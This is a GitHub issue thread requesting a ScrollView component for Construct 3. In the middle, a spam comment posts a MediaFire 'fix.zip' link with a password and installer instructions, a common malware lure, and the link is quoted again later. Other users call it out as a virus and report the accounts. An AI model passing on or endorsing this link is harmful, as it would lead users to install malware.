### ISSUE TITLE
Add a ScrollView Component that allows you to invoke another layout

### ISSUE THREAD

**Issue by skinkairewalker** [Scirra/Construct-feature-requests#351]
### Reviewed guidelines

- [X] I have read and understand the suggestion guidelines

### Checked for duplicate suggestions

- [X] I checked for existing similar suggestions

### Summary

Adding a ScrollView component that allows you to invoke another layout would be a very useful solution

### Possible workarounds or alternatives

**It is now possible to load HTML pages (via IFRAME)** which is extremely useful for creating interfaces as well. Who knows, maybe it would be possible to add the **IFRAME** functionality to load native Layouts from the project?

### Proposed solution

adding a ScrollView Component would make it easier to create User Interfaces that rely on scrolling without losing the power provided by Construct3.

### Why is this idea important?

It is an excellent resource to facilitate and speed up the process of developing user interfaces, not to mention the countless lines of code that we would save just by having to program scroll events and even design events, such as: Inventory Interfaces with sprites or patterns, Player Ratings or even non-scrollable resources.

### Additional remarks

Thanks for your attention :)

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by skinkairewalker** [comment]
> Baixar https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file senha: changeme No menu do instalador, selecione "gcc".

Do you think it's that simple to infect IT professionals with viruses? xD

**Comment by skinkairewalker** [comment]
Can someone ban this guy? He's spreading viruses here in the repository 
@xcloudzy

**Comment by xcloudzy** [comment]
> Can someone ban this guy? He's spreading viruses here in the repository @xcloudzy

thankyou for helping others someone hacked into my account and spam suspicious links

**Comment by alvaromartmart** [comment]
> > Can someone ban this guy? He's spreading viruses here in the repository @xcloudzy
> 
> thankyou for helping others someone hacked into my account and spam suspicious links

Yeah they're trying to do the same here using different accounts: https://github.com/Scirra/Construct-feature-requests/issues/350#issuecomment-2310274418

**Comment by xcloudzy** [comment]
> > > Can someone ban this guy? He's spreading viruses here in the repository @xcloudzy
> > 
> > 
> > thankyou for helping others someone hacked into my account and spam suspicious links
> 
> Yeah they're trying to do the same here using different accounts: [#350 (comment)](https://github.com/Scirra/Construct-feature-requests/issues/350#issuecomment-2310274418)

yeah i see many others account too i am now just deleting every single comment they made lmao

**Comment by alvaromartmart** [comment]
> > > > Can someone ban this guy? He's spreading viruses here in the repository @xcloudzy
> > > 
> > > 
> > > thankyou for helping others someone hacked into my account and spam suspicious links
> > 
> > 
> > Yeah they're trying to do the same here using different accounts: [#350 (comment)](https://github.com/Scirra/Construct-feature-requests/issues/350#issuecomment-2310274418)
> 
> yeah i see many others account too i am now just deleting every single comment they made lmao

I reported the users to Github too, I suggest you do the same 🙂

**Comment by xcloudzy** [comment]
> > > > > Can someone ban this guy? He's spreading viruses here in the repository @xcloudzy
> > > > 
> > > > 
> > > > thankyou for helping others someone hacked into my account and spam suspicious links
> > > 
> > > 
> > > Yeah they're trying to do the same here using different accounts: [#350 (comment)](https://github.com/Scirra/Construct-feature-requests/issues/350#issuecomment-2310274418)
> > 
> > 
> > yeah i see many others account too i am now just deleting every single comment they made lmao
> 
> I reported the users to Github too, I suggest you do the same 🙂

sure
